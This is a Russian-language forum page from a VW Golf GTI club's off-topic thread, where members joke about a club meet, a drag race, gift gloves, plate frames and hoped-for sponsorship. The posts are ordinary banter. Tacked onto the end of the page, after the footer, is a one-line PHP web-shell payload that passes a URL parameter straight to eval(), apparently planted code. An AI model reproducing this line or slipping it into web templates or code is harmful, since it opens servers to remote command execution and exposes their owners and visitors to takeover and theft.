+ Ответить в теме
Страница 1 из 122 1 2 3 11 51 101 ... ПоследняяПоследняя
Показано с 1 по 10 из 1211

Тема: ФЛУД


  1. #1
    GTI-Racing Bubinskiy is on a distinguished road Аватар для Bubinskiy
    Регистрация
    22.04.2009
    Машина
    Golf mkV GTI, DSG
    Сообщений
    844

    ФЛУД

    Цитата Сообщение от ФОРС Посмотреть сообщение
    Мрак... Ваня это что всё ????

    Основные фотки встречи клуба были сделаны уже после того как все овощи разъехались, и не захотели сделать совместную фотосессию!!! :laugh:


    Ага, а кто хоть предложил эту фотосессию сделать?
    Golf V GTI, DSG.

  2. #2

    ФЛУД

    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Ну что, параллелька, конечно, формат перспективный, но по-моему еще нужно много работать над доведением его до ума. Взять даже элементарные вещи типа освещенности трека, огромных клубов пыли, которые поднимают машины на треке.......................

    Зато были показательные заезды от ГТИ клуба в исполнении камрадов Молодого и Форса. Форс конечно же все время хотел всем показать как красиво дрифтит его болид, поэтому первым на финише был Виталик. Ну и конечно у Виталика было железобетонное преимущество в виде волшебных рамок под номера и омологированной футболки.

    Фото:

    http://picasaweb.google.ru/gticlubua...eat=directlink
    Ваня, прошу не забыть при следующей встрече забрать оранжевые перчатки подарок от Порше Украина! Должны были давать + 1 к ловкости, а нихера... давали -1 к удобству! Помоему тебя развели... обычные базарные поди всунули... Не кашерные какие то... Лучше след раз отдолжи свою коронну, она я слышал дает тебе не трек днях + 2 к скорости! :laugh:

    Задача Форса была попиариццо, и не паламать обвес и подсветку, и он ее на 100% выполнил!!! :laugh::laugh::laugh: Спасибо всем за поддержку! Было круто! :friends:

  3. #3
    [quote=Bubinskiy;145395]
    Цитата Сообщение от ФОРС Посмотреть сообщение
    Мрак... Ваня это что всё ????

    Основные фотки встречи клуба были сделаны уже после того как все овощи разъехались, и не захотели сделать совместную фотосессию!!! :laugh:


    Ага, а кто хоть предложил эту фотосессию сделать?

    да ты по моему уехал хронить кошку едва мы к месту сбора на стоянке подошли :laugh:...Мы с Олегом предлагали пофоткатся всем, но народ отмазался, типа дома ждут, устали и т.д. ... семейные люди, что поделать
    :expect:

  4. #4
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Цитата Сообщение от ФОРС Посмотреть сообщение
    Ваня, прошу не забыть при следующей встрече забрать оранжевые перчатки подарок от Порше Украина! Должны были давать + 1 к ловкости, а нихера... давали -1 к удобству! Помоему тебя развели... обычные базарные поди всунули... Не кашерные какие то... Лучше след раз отдолжи свою коронну, она я слышал дает тебе не трек днях + 2 к скорости! :laugh:

    Задача Форса была попиариццо, и не паламать обвес и подсветку, и он ее на 100% выполнил!!! :laugh::laugh::laugh: Спасибо всем за поддержку! Было круто! :friends:
    Вот же человек! Ему перчатки в масть на шару, а он недоволен......

    Видимо действительно только корона может Сережа тебя порадовать.....

    А насчет перчаток - как обычно чистый, как бы сказать, неправда. Кто первым на картинге приехал? Ты думаешь только из-за твоего веса 40 кг. в чешках? Нет! Волшебные Оранжевые Перчатки, дорогой Сережа, вот истинный секрет твоего первого места.

    А на параллельке ну как ты мог бы даже теоретически соперничать с Виталком, когда у него чудо-рамки и футболка с ФИА омологацией. Чтоб выигрывать параллельку, Сережа, нужно готовить себя и машину, поэтому против Виталика у тебя шансы были 0.
    Последний раз редактировалось IvanGTIV; 19.08.2009 в 00:11.

  5. #5
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Цитата Сообщение от ФОРС Посмотреть сообщение
    Чувак, как раз читал сегодня тоже эту статью!
    http://benzs.blogspot.com/2009/06/so...a-down-at.html

    думал прийду домой выложу в теме про ЛОГО из машин )) Опередил )))

    Пару идей можно у них позаимствовать, кстати у них буква L сделана всего из 6-ти машин! И отчетливо читаеться, по этому думаю надо вернуться к обсуждению данной идеи... только бы поддержку получить от спонсоров!
    Ладно, Сережа, раз ты такой стеснительный, все намеками, намеками, то скажу за тебя я, чего уж там.

    Наверное все заметили, что Сергей, почти в каждом посте про какое-нибудь мероприятие клуба упоминает кодовое слово "спонсоры".

    Кто мало знаком с Сергеем, так те могли бы подумать, что Сережа такой прижимистый парень и все хочет чтобы НАМ какой-то мифический спонсор все оплачивал. Поспешу внести ясность чтобы у Сережи не сложился неправильный имидж.

    На самом деле, когда Сережа пишет про спонсоров, он интеллигентно и тактично (не навязываясь) намекает на возможность взаимовыгодного сотрудничества клуба с одной мощной структурой, к которой Сережа имеет непосредственное отношение.

    Сережа! Хватить туман пускать! Хочешь предложить взять под мощное крыло торгового интернет-портала KOBA.UA наш маленький клуб так мы ЗА! Руками и ногами! Уверен не найдется в клубе человека, который будет против чтобы КОБА.УА проспонсировал мероприятие по логовыстраиванию.
    Последний раз редактировалось IvanGTIV; 19.08.2009 в 00:56.

  6. #6
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Вот же человек! Ему перчатки в масть на шару, а он недоволен......

    Видимо действительно только корона может Сережа тебя порадовать.....

    А насчет перчаток - как обычно чистый, как бы сказать, неправда. Кто первым на картинге приехал? Ты думаешь только из-за твоего веса 40 кг. в чешках? Нет! Волшебные Оранжевые Перчатки, дорогой Сережа, вот истинный секрет твоего первого места.

    А на параллельке ну как ты мог бы даже теоретически соперничать с Виталком, когда у него чудо-рамки и футболка с ФИА омологацией. Чтоб выигрывать параллельку, Сережа, нужно готовить себя и машину, поэтому против Виталика у тебя шансы были 0.
    Я был тоже в футболке!!! тут 1 - 1

    А рамки у меня тоже были!! только российские... или они в украине +1 не прибавляюТ ??? :howl::howl::howl:

  7. #7
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Цитата Сообщение от ФОРС Посмотреть сообщение
    Я был тоже в футболке!!! тут 1 - 1

    А рамки у меня тоже были!! только российские... или они в украине +1 не прибавляюТ ??? :howl::howl::howl:
    Ну результат твой на параллельке с твоими рамками и футболкой мы знаем, так что думай сам прибавляют или нет............................................... ......................

  8. #8
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    хочет чтобы ему какой-то мифический спонсор все оплачивал.
    Маленькая поправка Ваня! не ЕМУ а НАМ!

    Я не припомню что бы лично для себя просил Оранжевые перчатки за то что толкнул идею... и так же не просил ничего другого за то что ездил с флагами фольцваген наклейками и т.д., я и сам зарабатываю себе на жизнь и на машину!!!

    Меня беспокоит НАШ клуб! И я в который раз привожу в пример БАВАРИЮ! Которая сотрудничает вместе с мини клубом, и которая тоже за счет того же мини клуба ОТЛИЧНО СЕБЯ ПИАРИТ! И всем хорошо! И ВСЕ ДОВОЛЬНЫ И СЧАСТЛИВЫ!

    А вот чего ты достиг как представитель нашего клуба... я пока не понимаю... рамки и те за свои деньги надо покупать :howl:

  9. #9
    Цитата Сообщение от IvanGTIV Посмотреть сообщение
    Ну результат твой на параллельке с твоими рамками и футболкой мы знаем, так что думай сам прибавляют или нет............................................... ......................
    Чувствую пока я не куплю у тебя рамки ты мне покоя не дашь :laugh::laugh::laugh:

  10. #10
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    Цитата Сообщение от ФОРС Посмотреть сообщение
    Чувствую пока я не куплю у тебя рамки ты мне покоя не дашь :laugh::laugh::laugh:
    Та шо там те рамки, чую ты на КОРОНУ нацелился, ох чую.........

    гы гы.

+ Ответить в теме
Страница 1 из 122 1 2 3 11 51 101 ... ПоследняяПоследняя

Похожие темы

  1. Флуд на тему APEX GROUP
    от White pony в разделе Курилка
    Ответов: 59
    Последнее сообщение: 28.05.2012, 12:22
  2. флуд на тему гонок с селиками
    от 3BEPb в разделе Авто спорт
    Ответов: 715
    Последнее сообщение: 09.08.2007, 15:06

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}